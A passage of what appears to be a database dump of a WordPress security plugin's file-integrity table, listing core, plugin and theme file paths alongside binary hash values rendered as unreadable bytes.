����)��o��^\n�','l���\Z!:�Ϋ�?!���i����;�i�','',0,'?'),('EJ�TW����D�)����','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-rename-login-feature-pre-5-7.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����f�qX�����','kO[0�Xn@�ȇr02]��-����\n,���8','',0,'?'),('EQ�{T�.\0Wr*B�','wp-content/themes/regina-lite/layout/js/plugins/bxslider/bxslider.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�^z��wcv��X�','���z�Nn�V��-L���b/�Q^��S�y]D','',0,'?'),('Eh�������@aq��','wp-includes/session.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�NRM��<\\����>��','}����k+8M�U=<;��t����I*,�4#�','',0,'?'),('Ei&��@�iNo=��\Z�','wp-content/themes/wp-barrister/library/images/icon-ot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]�k]�a�Q1G#\0�Y','���1:���#n�[�>�)���x��}-��BL�','',0,'?'),('E���c\\3͟Kpyq&e','wp-content/themes/vision-lite/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�D �=�h��<x','u3F�1jNK����2ҶVʗĞy�b�14�L','',0,'?'),('E��(�zRA1;eN�qD3','wp-content/plugins/wordfence/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2��e��ª��\\�og','�� ��o���M�J#�A|�ߎ�(��;6R\n�','',0,'?'),('E��,�)��?8��=3 ','wp-content/themes/regina-lite/layout/js/plugins/waypoints/waypoints.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9���й,n`\0���','\Z�\r���������wt�g7zU��j�P�G�','',0,'?'),('E�im�/��f\\��8+Z','wp-content/plugins/wp-cerber/assets/flags/gl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���8�+xO,�o*�}9','J\'�Ѫ��(�6����臚#��{�dp�I�','',0,'?'),('E�}�~��M��-�]�a','wp-admin/css/widgets.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xl�Y}���q�\r���7$','��w�?�Z�L\0�ì*8��L_���5��`��','',0,'?'),('E���b�Cj��-u','wp-content/themes/healing-touch/images/welcome_doctor.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Nױĕ�E�5,1�','��W�DCƥ�k��9��\'��T\r P','',0,'?'),('E���9�%��s�e','wp-content/themes/doctors/core/contents/part_footer/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'a� VCsI\ZIr�\Z;#','��Wܷ�DI.5������H��\\���V9p��','',0,'?'),('E�z�6<�\r*\r��~\0','wp-content/themes/doctors/core/contents/loop_templateSitemap/templateSitemap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('E�V��,�%��,SM=','wp-admin/ms-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P3�\n��7|L?MtA���','a����c�sc\Z���\"�V�L\\�њ�','',0,'?'),('E�B3A���-\r�&!�T','wp-content/plugins/wordfence/modules/login-security/views/onboarding/standalone-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D�o��y�벍cK�',':P��cc�z�\"�����Q�a���QZ�d','',0,'?'),('E�Dc�9�>�� ��v','wp-content/plugins/wp-cerber/nexus/cerber-nexus-slave.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h9�H��듦)�x��','pYq�e�\'I\n:�\0�y%G�C-|M�gf��','',0,'?'),('E�e&��0�\'�0��٣','wp-content/plugins/wp-cerber/assets/flags/ga.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`#�HG�)����4X�','�NvX���aa %�Q�U�SJX;M.G�j','',0,'?'),('F�Hȝl�e��#�','wp-includes/js/tinymce/skins/wordpress/images/more-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l,��r�%�^x�%','���Y=�_�b��|ʧ&f,��<�������','',0,'?'),('F������Z����n','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/controls/range-slider/range-sliders.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g����#sQ�p��_63','�/;�-��FDSk@^�c\r4�Q�D��%fv','',0,'?'),('Fq�����E؇��','wp-content/plugins/wp-cerber/assets/ui-stack.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��N3�ߪ���(Q','�\"%cb�[$2��\Z��\rN�w`� �?&�L�\\','',0,'?'),('F\r�x�w~�\rܱ��\n�','wp-includes/widgets/class-wp-widget-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}��z�Ys��]�','H:�wn����n8V��9�\'�tLYƭBq����','',0,'?'),('F1+\Z#�+d�{�w�{','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.D6�p�i�r`�fw�=','�2��KJ73��x�2�M2��&�+���L��L','',0,'?'),('FCW.�3���\Z��U�','wp-includes/js/jquery/ui/checkboxradio.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˂��_���>��Klk','Ě�8�\nm��r+\"�?�~iLOVR~��C','',0,'?'),('FE>�b�2A㏃9�\n','wp-content/themes/regina-lite/layout/css/mobile.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','NRs���8\0\"��7�','�\0��HE�\\�m�Iww��[0����','',0,'?'),('FF�v��V;v�8/�\r��','wp-includes/SimplePie/Misc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I��\Z��}[�X�rb^','U�l?l�N�v6�0\'�,��(N��\0�&��','',0,'?'),('FH���30m�:��s��','wp-includes/js/tinymce/skins/wordpress/images/dashicon-edit.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xR� �Y�X���ݤ���','m���\Zc���ĭ��]���[��^�P��w','',0,'?'),('Fa�C,�g$�բ�my�','wp-content/themes/healthcare/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ъqK��@8L>+','_}�!ƭQ~�M�%$�m� ��<S.m����t','',0,'?'),('Ff�6��_A�&�T�td','wp-content/themes/healthcare/front-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tU���\'�~<�:��4�',',=�l#w����u6�3����Ȣ��Z.���,b�','',0,'?'),('Fg��5�F\n�+�93','wp-content/plugins/wp-cerber/cerber-ds.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��CcBP�\"��~�',']����9�e0�`����T�]�Q�}`�a�','',0,'?'),('Fq��#�d���!RGL�','wp-content/themes/weblog/assets/library/owl-carousel/owl.carousel.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����DF�H�<�P<E�','��p�?��I�Ü$�d�Б>d���Ί1�','',0,'?'),('F{��IIg�m�Z>�M�7','wp-content/themes/doctors/core/contents/loop_templateSitemap/skin1/html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('F|����w�ZQ,O��','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6���?�\n� :�{Q%','���Z�IK/I��w¥�Ovy�E�Bi\\$G�&','',0,'?'),('F}3�(�̬�OI ��','wp-content/themes/twentytwentyone/assets/sass/05-blocks/separator/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��j;�ʻ��#��qb','m7w�W���&em�C������1��a�c =27','',0,'?'),('F���Ժ6��ފ\0�Q','wp-content/plugins/wp-cerber/assets/flags/by.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Fƞ�01���','R8�;��k�m��l�X��V�6�V�\"��ď','',0,'?'),('F�<�g�b�y���l\r','wp-content/themes/wp-barrister/library/js/scripts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+�%}y�-��H�~U(','�E�\'�9Um�k����ML��~_Kg�jE��','',0,'?'),('F�\\�C?�Z���','wp-includes/css/customize-preview-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��މ����ګd��3','~�\'��[z�{��:����LĀN7A�� ','',0,'?'),('F���Q���\r��K&�','wp-content/themes/doctors/core/home/blocks/info_box/skin1/c-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7���T.��_��\\^','H���v;�\0%0 �{��Y�8�>>�7LyR�','',0,'?'),('F��Ã\\�O�fg�','wp-includes/js/tinymce/skins/wordpress/images/gallery-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1����v��R','N3G�\'�`��+R>�P]E�γg/�b?���UX','',0,'?'),('F�0�\'b���Fo1b=�','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/previewer/components/color-schemes.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`lp#�\'B�!JF','��:F��WǓU;���!\0�*{�9W�X<�b�','',0,'?'),('F�\'�B�/�4{J�{w','wp-admin/js/edit-comments.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','삺�m��\n\'��P�','^���;(�R�@ݪ:��:_9���*j���','',0,'?'),('F���?�C;$��H\r\r','wp-admin/css/color-picker.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z=�����EG�> �1\Z<','t-�]Lb8�n�d�\\pm^�����i[�c�\Z��','',0,'?'),('F�V����Od%�|u�','wp-content/plugins/wordfence/images/wordfence-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p����]�j-����','8�����#̄(8��O�\"� +h\"Fb��','',0,'?'),('F�y�t3EG]�F6�','wp-content/themes/regina-lite/sections/section-home-speak.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-#�E�8���I�\Z�1','!�\0����G�(���ӳ[k(6��+�����','',0,'?'),('G Xe�x��w0\\�o8','wp-includes/Requests/Response/Headers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�ÂҶ�A-��>c�`','�E�\n�F � ���M���%{��a���`,�','',0,'?'),('G6U�2\01R������J','wp-admin/js/theme.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R��s�p���p1��','Uuu� jK��>}��ʊ$|@.8K3����','',0,'?'),('Gm��:�MľV��LЉ','wp-includes/js/tinymce/utils/editable_selects.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J��q2��I\'�J�9�E','�v��Gjs��f�� e�d�&�g��+���','',0,'?'),('Gq�b٫ ������s�','wp-content/plugins/wp-cerber/assets/bn2ra.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���8�^ְ��sO','g���c}�;\'�B��9�ق�\Z4CW��JR�%��','',0,'?'),('Gu�������ʭ�','wp-includes/class-wp-meta-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K��C��̚{\"Hp�=','��R�����l�� �n���\\��h����ݢ','',0,'?'),('Gu5���aԯ��','wp-includes/rest-api/search/class-wp-rest-post-search-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}*�yY��ը�F�','1��SD��v�jk3�\0�G�<�\'|��!���','',0,'?'),('Gu�^�/1��ՁS�7','wp-includes/atomlib.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2*rMb3ы�y��','��:��8��px� ��������}��)�!�','',0,'?'),('G�9q���=ʥ[3?a�','wp-admin/images/bubble_bg-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ϭq�j��\n�X�<','n��%4��L���6{�/Т[�Ĭ?XW_A.r','',0,'?'),('G�7\Z��I&:�x','wp-admin/edit-form-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A˼ܗ\ri^o4~�','��Q9sY��&a��*�}J�x�1��u����','',0,'?'),('G�,P[Z5�u��Xa�P','wp-content/themes/skt-toothy/images/page-image-2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0f�4��ߎB����I','X4c���� ��Ma��y�>�+�\\40b||=;','',0,'?'),('G�d���IέיDj','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/grade-system/wp-security-feature-item.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A���f�R���emV�k','����I�C�O�Y�ʋp �0Ox�1{t<�','',0,'?'),('G�?�yİ���~r&','wp-content/themes/twentytwentyone/assets/sass/05-blocks/group/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s���#�Rw�ij\n��','&T�)\'4:���\"v�t*���\n�����J\ZR�','',0,'?'),('H�\0 �� N�HB]I','wp-content/themes/twentytwentyone/template-parts/content/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�8�{N����W�L','�>��Q�#*������^�_(VY&I�@H�҇[�','',0,'?'),('HX�Oq��U���x<','wp-content/themes/weblog/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|��ʅ�w����(v�X�','\\�~�_�R>4�` 㧿��0,�5�}*3ZU�','',0,'?'),('H\n��nR�ʝ���烬�','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/classes/class-epsilon-sanitizers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��+��q�7����','h]ɏ`gqnZ��1�ymK��L�0L1��p','',0,'?'),('H\rz��QМ�r�H��','wp-content/themes/wp-barrister/sidebar-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%��G;�n��t','/\0����u�ZA��81?�)��2K����_���','',0,'?'),('H�Y�fUH�u�pd','wp-includes/Requests/Exception/HTTP/400.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�n���VJ�R�x�5��','�d�>���� �i�H����b$�&�n���6�p\Z','',0,'?'),('Hd.\\�xdd�o�','wp-content/themes/doctors/core/home/blocks/testimonial/skin1/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^-lfP}�� �\'�C','�랁�n�\\(s`�7�VlC]/\n�\Z�S�w1��K','',0,'?'),('H+�E~�}�1Q���','wp-includes/js/wp-util.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R�H��OZ\'�]1�T','���;@�O0,�KG#�&h0�RҘ�6�0���T','',0,'?'),('HA���f�,���$F-�','wp-admin/css/customize-nav-menus-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{&��Þ���>��','�i$�z:1$s+»����̔��\Z��!o��','',0,'?'),('HGh\'�x�R���~\n','wp-admin/js/customize-nav-menus.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q�E�{�F�\n���','qC�&�+�N<[�l\\{V�h�R�)��Ž2�','',0,'?'),('H`�\\� �r���Y�C','wp-admin/includes/class-theme-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�ȣ�\0���O�)l+','u��S����u�����iD�p�,\\��C�M5�','',0,'?'),('Hmϡ\n��\0M�}0\"ؒ�','wp-content/themes/twentytwentyone/template-parts/header/excerpt-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%�L�AZ;ߪ��u','�� ��w�M���ӳY�\r�%��%�\'�aO�A&�x','',0,'?'),('H�ংݭ���A��/','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-select2-multiple.php',0,'�;�c���\0�p�s�','�;�c���\0�p�s�','>�q{(�+fޙ`�=��a@��3bzܥа�l','',0,'?'),('H�)�f�D<�\ZbH���','wp-content/themes/advance/inc/kirki/includes/class-kirki-settings.php',0,'=^%UXAa\Z���)Q�','=^%UXAa\Z���)Q�','�uL��(n��Z]�\Z��3�Q֚�I\"�a�','',0,'?'),('H��Y6o��D{�LH��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u.S��y�l�=\0C�>','�?�\\x`��Q�=���8:�v�sT��','',0,'?'),('H�͛�&����;�fY7','wp-content/plugins/wordfence/css/jquery-ui.structure.min.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�/��h<��U��','�n���i��뗅�N�vX�7�Y]�����D','',0,'?'),('Hý��i�Z�U,H�L','wp-admin/includes/meta-boxes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�4/[\"\r���R�','$Ƙ-����+��_��I�ښi����\r�2��','',0,'?'),('H���C�Tp(^��l�','wp-content/plugins/wordfence/modules/login-security/classes/controller/users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Po��3���~��Q','����k��_�?�E�%�Gޓi��BEOyQ��','',0,'?'),('H��!��[?�z>����','wp-content/plugins/akismet/class.akismet-rest-api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','⺅�:K���7&Z9Hc','�*�F��:��Å=IH\'x��\\\"��\'��:','',0,'?'),('H��J�A���\'���','wp-content/themes/skt-toothy/css/responsive.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f����%����a���','�)\r�m䄰\Z����\\[��.5,���B�c','',0,'?'),('I2\r%1��|p]���','wp-content/plugins/redirection/redirection-api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��+�v�x�[Y2\"*��','&��A�����K�(ٮ)G�M�+1�9*���~��','',0,'?'),('IW�9�a��W��3(','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/mysql.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q\r���rY�VU�f�','��[����핚���\"�M��t��&yָ�IC','',0,'?'),('I#M�ͮ�zY��&{�F','wp-content/themes/weblog/assets/js/acme-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�ו�RӍ�tvBY��','�i�R�qx�h�W#�n����4�tQL','',0,'?'),('I0��S�$2�T�B*','wp-includes/widgets/class-wp-widget-calendar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y N��ɔ]7l�','M�>����f(E���r_hX���oۃ��8@�+O','',0,'?'),('I6.:\n(��i\0B��','wp-includes/rest-api/fields/class-wp-rest-user-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H\r\r�0�X/^�0R','O��1�-p�Qۊ��8�Z+�$[��j���K��','',0,'?'),('I6U�\r7����3p�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/falsepositive.key',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h<��|�7b����','��_�^F\"��;+r&Z~ӦQ����|�5�','',0,'?'),('IQM{��:�\r|�6c�e','wp-content/plugins/wp-cerber/assets/flags/il.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D��~����3�24�Z�','�b=1<�:�1�ƭ��nn���`�%ޘ��Ϯ�','',0,'?'),('I��:Bs�#���@�','wp-blog-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_BZF1���y����)',';\Z�/\\b���t���I���͝���h��w�','',0,'?'),('I��Ҏc�\\R���e�','wp-content/themes/wp-barrister/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�9�>4������8J�','ilz���{��m�U��gƾ�X���I��','',0,'?'),('I�Ԭ�l��v0O','wp-includes/js/dist/core-data.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+�;Q��z@�?#�_�','�2�Fsc�jp{�ѳtG��1D�Y0�Ƶ�QV�@��','',0,'?'),('I�PE�Xt�FH�%�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\0��Lv�[c��)?','�C�h!݀F$�}�wd�7b(�!�p�IF.L�','',0,'?'),('I�V/��6�s��','wp-admin/js/editor-expand.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','´R�[��6\\gTԄL_�','�vI\n6��6��%VG��}����@of�e;','',0,'?'),('J�%.��~�q�l�','wp-includes/class-wp-text-diff-renderer-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-�����g0HFuI�','�_h+�U��H�i��_��e� w����6��','',0,'?'),('J?#�͌$M�7�c�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractPlaceRecord.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�I.:���`PR�','#z��R�\ZHU���>B�nP,���\'�eT�tߺ','',0,'?'),('Jf�3?���_r�C�','wp-admin/images/w-logo-white.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n���Jvۢ~�y�\\�','n��D��� _�;�!G�םcV�0M9i�=�','',0,'?'),('J��E[�7U��\Z�~','wp-includes/js/plupload/handlers.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�� �~�5��8�ͫ;�','� �\n�Z\rZ�B�[9��z��S)��4M%��','',0,'?'),('JyQl��D�!�HV�','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-bot-protection.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Ɩ}�7\"]� Q�P|','�]a��;�tMY^�v�6�j����ꬆ��','',0,'?'),('J8�E��Dh+���F','wp-admin/js/site-health.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ӛ���G��\'W���','���ij��x�\0ךM5+�i���@èQj8�v\"','',0,'?'),('J{�ֹZi^ùx�I','wp-admin/media-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':�?��T���i�\"=','\"��On]O�k;��Y�}��rG��yf�%�O 8\\','',0,'?'),('J�lN��p?�+X���','wp-content/themes/healing-touch/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݟ\n �茟K���1�\'','�!� *n�A�i.b��)5�$��T�+g�T;l�','',0,'?'),('J�>����\"��/','wp-includes/Requests/Auth.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1��R��W��ÔO[��J','bO�Q�wù�LѠâ��������9Q��lrl','',0,'?'),('J�����Ǵ�Ծ�c�','wp-content/themes/twentynineteen/images/pattern_01.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�;�QB��X����','��(��3�g`&}�5)�s��}me2�G��[�','',0,'?'),('Jլ4��\r�n���','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777620_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�\\c7�y�x�гl','�~��qV����*\'�1�����]3�^�����m','',0,'?'),('J��Oh��sDؾ','wp-includes/js/zxcvbn.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','| ���#PV /{�M�_','v�XI�9��n�1e�6��C�\\�.p+�\"��K�','',0,'?'),('J������Fý��q�','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/controls/image/image.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rEHb�J$~qRMQl�,','68E�<�z��ihM|R��9�C���$����I','',0,'?'),('K�,��<�fƑY�','wp-content/themes/twentytwenty/inc/custom-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K���<���ȝ���a','ߌ녔B��J+�f�,q*�WC\"^_�V\0.s�@�','',0,'?'),('K���ߺ�b�','wp-content/plugins/wordfence/lib/compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>���z�x��C�}','�Nܓ�#d�t�B!\"M՞�==�@o��','',0,'?'),('K���=%�;̋�V���','wp-content/themes/doctors/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mG\0����5�T z�','ގ�n��f|y��2nVO���y�ZI�xv�','',0,'?'),('K0���\r��ܐcn�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�29Y¿,E#�/����','� � ��h<)s��>-P��{���K���I�\0��','',0,'?'),('K9\'Cs��w0�*o�{','wp-content/themes/advance/inc/kirki/assets/js/postmessage.js',0,'�p�&aJ\\!MK�P�7','�p�&aJ\\!MK�P�7','���I�0���(\'{���I5o����0[\\x','',0,'?'),('K>�^[�P�F�1�h:','wp-includes/blocks/social-link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0,}J\"��N������','�ޝ�+-%]����ٲ�d�)�_�v?O�(�Y\'\\','',0,'?'),('KKOf�Sd�iB0Ov��','wp-content/plugins/wordfence/views/scanner/scanner-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\j�6Ii��\\u�v','\"9t��Y?�²�L���ykg������=�ۢ�','',0,'?'),('KlR9�ʔ���$�<','wp-content/themes/weblog/assets/library/owl-carousel/owl.carousel.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��r/�>(���c�p','\"�g����O�Nd���Z�m{x�%��@|:w�','',0,'?'),('K�nҋD&sR�WU(�','wp-admin/css/farbtastic.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�^�:�G�(���:k\n','4��7V�f�� �/��������D��W3p','',0,'?'),('K�c��#2s�/(�\"�','wp-includes/widgets/class-wp-widget-pages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�E,��ߓ%_�','<6�8��1J�ߧr(;�c�?@�|uR�\nŞ�','',0,'?'),('K��<�H<7�E�,l��','wp-content/plugins/wordfence/views/waf/options-group-brute-force.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�p�k�<���#Y','Qx�b���nbWK����E*�l�o��ޅ��ʛ��','',0,'?'),('K��cE�j��zeů�8','wp-includes/block-patterns/text-three-columns-buttons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8�tH�W��%���','ޗ��غ�Ku�\0M�x>]Z�\"�z�8Ŏ�V','',0,'?'),('K��ɹ���jwD�x�','wp-content/plugins/wp-cerber/assets/flags/us.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J��V�w\Z]�Ay��','���L�CI`�^�J4�=��0���C�C}�','',0,'?'),('K����\r\\Uz��\Z:\'','wp-includes/sodium_compat/namespaced/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�*��F谯��<��l','�®�R�l�U�����wz�ank��G�t�3�','',0,'?'),('K��]C��l7:�D\0','wp-admin/js/widgets/media-audio-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P IM�;p8vn��[�S','����9j��lxB�eH:�y�%}�c TP�_�','',0,'?'),('K�Lx<C���H��e\Z','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�EN�Ăۛ(\n�n','����Ѭ}^�EF����>��ڂB��','',0,'?'),('K�bw��y��.�3�{¥','wp-content/plugins/wp-cerber/assets/flags/pk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����00�%��[.�','Gjۀ���H��$�׃��m\'�^ O�n���','',0,'?'),('K� ���*�;ܼ�nc','wp-includes/blocks/calendar/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Y��P#����(i�','�D���]^��~��>�r~]�E^anK-qHMe�','',0,'?'),('K��W�&\0\0K�\06�G�','wp-admin/js/set-post-thumbnail.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':1N�(�xl�X��\'','v9�\n{lK��~q�#�>��ߦ��� J�`~','',0,'?'),('K�K+�2� aeZ�e','wp-includes/class-walker-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I#�h�Z~�����@��','�Xs�W��l����:\"��0����;����LL','',0,'?'),('K����=������D�','wp-content/themes/doctors/core/contents/part_header/skin1/css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0������ɉ�G���','��W�I�Y|�w���O�]V����pg��q�I�','',0,'?'),('L\0�iQ3X 